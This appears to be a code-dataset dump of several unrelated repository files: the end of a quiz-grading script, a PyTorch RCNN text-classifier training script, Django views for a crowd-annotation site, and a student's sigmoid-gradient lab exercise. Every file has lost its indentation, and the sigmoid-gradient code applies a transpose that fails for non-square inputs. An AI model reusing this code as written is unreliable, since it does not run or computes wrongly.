(0,0) : "You haven not solved any exercises. Please study more."}
def get_final_result():
number_solved = count_solved_exercises()
for (grade_min, grade_max) in feedback_options.keys():
if (number_solved >=grade_min) and (number_solved <=grade_max):
feedback = feedback_options[(grade_min, grade_max)]
print("You have got {} out of {} points".format(number_solved, 8))
print(feedback)
break
``` |
{
"source": "a2un/CS3710-Course-Project",
"score": 2
} |
#### File: a2un/CS3710-Course-Project/main.py
```python
import os
import argparse
import logging
import random
import numpy as np
import torch
from torch.utils.data import DataLoader, random_split
from build_vocab import build_dictionary
from dataset import CustomTextDataset, collate_fn
from model import RCNN
from trainer import train, evaluate
from utils import read_file
import pandas as pd
from sklearn.model_selection import train_test_split
from os import path,mkdir
import matplotlib.pyplot as plt
logging.basicConfig(format='%(asctime)s - %(message)s', datefmt='%m/%d/%Y %H:%M:%S', level=logging.INFO)
logger = logging.getLogger(__name__)
def set_seed(args):
random.seed(args.seed)
np.random.seed(args.seed)
torch.manual_seed(args.seed)
if args.n_gpu > 0:
torch.cuda.manual_seed_all(args.seed)
def setup_data():
dest_path = './data'
df = pd.read_csv(path.join(dest_path,'all_data.csv'))
train, test = train_test_split(df, test_size=0.2,random_state=42)
train.to_csv(open(path.join(dest_path,'train.csv'),'w+',encoding='utf-8',errors='ignore'),index=False)
test.to_csv(open(path.join(dest_path,'test.csv'),'w+',encoding='utf-8',errors='ignore'),index=False)
def main(args):
acc_list = []
f1_score_list = []
prec_list = []
recall_list = []
for i in range(10):
setup_data()
model = RCNN(vocab_size=args.vocab_size,
embedding_dim=args.embedding_dim,
hidden_size=args.hidden_size,
hidden_size_linear=args.hidden_size_linear,
class_num=args.class_num,
dropout=args.dropout).to(args.device)
if args.n_gpu > 1:
model = torch.nn.DataParallel(model, dim=0)
train_texts, train_labels = read_file(args.train_file_path)
word2idx,embedding = build_dictionary(train_texts, args.vocab_size, args.lexical, args.syntactic, args.semantic)
logger.info('Dictionary Finished!')
full_dataset = CustomTextDataset(train_texts, train_labels, word2idx, args)
num_train_data = len(full_dataset) - args.num_val_data
train_dataset, val_dataset = random_split(full_dataset, [num_train_data, args.num_val_data])
train_dataloader = DataLoader(dataset=train_dataset,
collate_fn=lambda x: collate_fn(x, args),
batch_size=args.batch_size,
shuffle=True)
valid_dataloader = DataLoader(dataset=val_dataset,
collate_fn=lambda x: collate_fn(x, args),
batch_size=args.batch_size,
shuffle=True)
optimizer = torch.optim.Adam(model.parameters(), lr=args.lr)
train(model, optimizer, train_dataloader, valid_dataloader, embedding, args)
logger.info('******************** Train Finished ********************')
# Test
if args.test_set:
test_texts, test_labels = read_file(args.test_file_path)
test_dataset = CustomTextDataset(test_texts, test_labels, word2idx, args)
test_dataloader = DataLoader(dataset=test_dataset,
collate_fn=lambda x: collate_fn(x, args),
batch_size=args.batch_size,
shuffle=True)
model.load_state_dict(torch.load(os.path.join(args.model_save_path, "best.pt")))
_, accuracy, precision, recall, f1, cm = evaluate(model, test_dataloader, embedding, args)
logger.info('-'*50)
logger.info(f'|* TEST SET *| |ACC| {accuracy:>.4f} |PRECISION| {precision:>.4f} |RECALL| {recall:>.4f} |F1| {f1:>.4f}')
logger.info('-'*50)
logger.info('---------------- CONFUSION MATRIX ----------------')
for i in range(len(cm)):
logger.info(cm[i])
logger.info('--------------------------------------------------')
acc_list.append(accuracy/100)
prec_list.append(precision)
recall_list.append(recall)
f1_score_list.append(f1)
avg_acc = sum(acc_list)/len(acc_list)
avg_prec = sum(prec_list)/len(prec_list)
avg_recall = sum(recall_list)/len(recall_list)
avg_f1_score = sum(f1_score_list)/len(f1_score_list)
logger.info('--------------------------------------------------')
logger.info(f'|* TEST SET *| |Avg ACC| {avg_acc:>.4f} |Avg PRECISION| {avg_prec:>.4f} |Avg RECALL| {avg_recall:>.4f} |Avg F1| {avg_f1_score:>.4f}')
logger.info('--------------------------------------------------')
plot_df=pd.DataFrame({'x_values': range(10), 'avg_acc': acc_list, 'avg_prec': prec_list, 'avg_recall': recall_list, 'avg_f1_score': f1_score_list })
plt.plot( 'x_values', 'avg_acc', data=plot_df, marker='o', markerfacecolor='blue', markersize=12, color='skyblue', linewidth=4)
plt.plot( 'x_values', 'avg_prec', data=plot_df, marker='', color='olive', linewidth=2)
plt.plot( 'x_values', 'avg_recall', data=plot_df, marker='', color='olive', linewidth=2, linestyle='dashed')
plt.plot( 'x_values', 'avg_f1_score', data=plot_df, marker='', color='olive', linewidth=2, linestyle='dashed')
plt.legend()
fname = 'lexical-semantic-syntactic.png' if args.lexical and args.semantic and args.syntactic \
else 'semantic-syntactic.png' if args.semantic and args.syntactic \
else 'lexical-semantic.png' if args.lexical and args.semantic \
else 'lexical-syntactic.png'if args.lexical and args.syntactic \
else 'lexical.png' if args.lexical \
else 'syntactic.png' if args.syntactic \
else 'semantic.png' if args.semantic \
else 'plain.png'
if not(path.exists('./images')):
mkdir('./images')
plt.savefig(path.join('./images',fname))
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('--seed', type=int, default=42)
parser.add_argument('--test_set', action='store_true', default=False)
# data
parser.add_argument("--train_file_path", type=str, default="./data/train.csv")
parser.add_argument("--test_file_path", type=str, default="./data/test.csv")
parser.add_argument("--model_save_path", type=str, default="./model_saved")
parser.add_argument("--num_val_data", type=int, default=10000)
parser.add_argument("--max_len", type=int, default=64)
parser.add_argument("--batch_size", type=int, default=64)
parser.add_argument("--lexical", dest='lexical', action='store_true',default=False)
parser.add_argument("--syntactic", dest='syntactic', action='store_true', default=False)
parser.add_argument("--semantic", dest='semantic', action='store_true', default=False)
# model
parser.add_argument("--vocab_size", type=int, default=8000)
parser.add_argument("--embedding_dim", type=int, default=300)
parser.add_argument("--hidden_size", type=int, default=512)
parser.add_argument("--hidden_size_linear", type=int, default=512)
parser.add_argument("--class_num", type=int, default=4)
parser.add_argument("--dropout", type=float, default=0.0)
# training
parser.add_argument("--epochs", type=int, default=10)
parser.add_argument("--lr", type=float, default=3e-4)
args = parser.parse_args()
args.device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
args.n_gpu = torch.cuda.device_count()
set_seed(args)
main(args)
``` |
{
"source": "A2Zadeh/CMU-Crowd",
"score": 2
} |
#### File: main/views/workers.py
```python
from django.contrib.auth import login
from django.shortcuts import redirect,render
from django.views.generic import CreateView
from main.models import User,Job,Annotation,Batch,Worker
from ..forms import WorkerSignUpForm
from django.template import Context, Template
from django.conf import settings
import json
import pdb
class WorkerSignUpView(CreateView):
model = User
form_class = WorkerSignUpForm
template_name = 'registration/signup_form.html'
def get_context_data(self, **kwargs):
kwargs['user_type'] = 'worker'
return super().get_context_data(**kwargs)
def form_valid(self, form):
user = form.save()
return redirect('accounts/login')
def dash(request):
worker = Worker.objects.get(user=request.user)
work_done = Annotation.objects.filter(worker=worker).count()
context = {'work_done':work_done,
'last_job': None,
'admin_email':settings.CONTACT_EMAIL
}
if work_done > 0:
last_job_done = Annotation.objects.filter(worker=worker).last().batch.job
context['last_job'] = last_job_done
return render(request, 'main/workers/dash.html', context)
def view_jobs(request):
jobs = Job.objects.all()
context = {"jobs":jobs}
return render(request, 'main/workers/view_jobs.html', context)
def view_annotations(request):
worker = Worker.objects.get(user=request.user)
annotations = Annotation.objects.filter(worker=worker)
context = {"annotations":annotations}
return render(request,'main/workers/view_annotations.html', context)
def batches_complete(job):
batches = Batch.objects.filter(job=job)
done = [b.is_completed or b.is_cancelled for b in batches]
return all(done)
def jobs(request, job_id):
job = Job.objects.get(id=job_id)
if batches_complete(job):
return render(request, 'main/workers/job_complete.html')
template_url = job.html_template.url
render_url = template_url.replace("/media/", "") #remove /media/ prefix
#Oldest batch not completed && cancelled
current_batch = (Batch.objects.filter(job=job).filter(is_completed=False)
.filter(is_cancelled=False).first())
batch_content = json.loads(current_batch.content)
if request.method == 'POST':
content_dict = {k: v for k, v in request.POST.items()
if k != 'csrfmiddlewaretoken'} #remove csrftoken
worker = Worker.objects.get(user=request.user)
#Create annotation object
Annotation.objects.create(
worker=worker,
batch=current_batch,
batch_content_index=current_batch.num_completed,
content=json.dumps(content_dict),
)
current_batch.num_completed += 1
current_batch.save()
if current_batch.num_completed == current_batch.num_HITs:
current_batch.is_completed = True
current_batch.save()
context = batch_content[current_batch.num_completed]
return render(request, render_url, context)
``` |
{
"source": "A2Zntu/ML_HW",
"score": 4
} |
#### File: ML_HW/Lab4/sigmoidGradient.py
```python
from sigmoid import sigmoid
import numpy as np
def sigmoidGradient(z):
#SIGMOIDGRADIENT returns the gradient of the sigmoid function
#evaluated at z
# g = SIGMOIDGRADIENT(z) computes the gradient of the sigmoid function
# evaluated at z. This should work regardless if z is a matrix or a
# vector. In particular, if z is a vector or matrix, you should return
# the gradient for each element.
# The value g should be correctly computed by your code below.
g = 0
# ====================== YOUR CODE HERE ======================
# Instructions: Compute the gradient of the sigmoid function evaluated at
# each value of z (z can be a matrix, vector or scalar).
try:
if len(z.shape) == 2:
g = np.multiply(sigmoid(z), np.transpose(np.ones((z.shape[0], z.shape[1]))-sigmoid(z)))
elif len(z.shape) == 1:
g = np.multiply(sigmoid(z), np.transpose(np.ones((z.shape[0]))-sigmoid(z)))
except AttributeError:
g = sigmoid(z) * (1 - sigmoid(z))
# =============================================================
return g
``` |
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.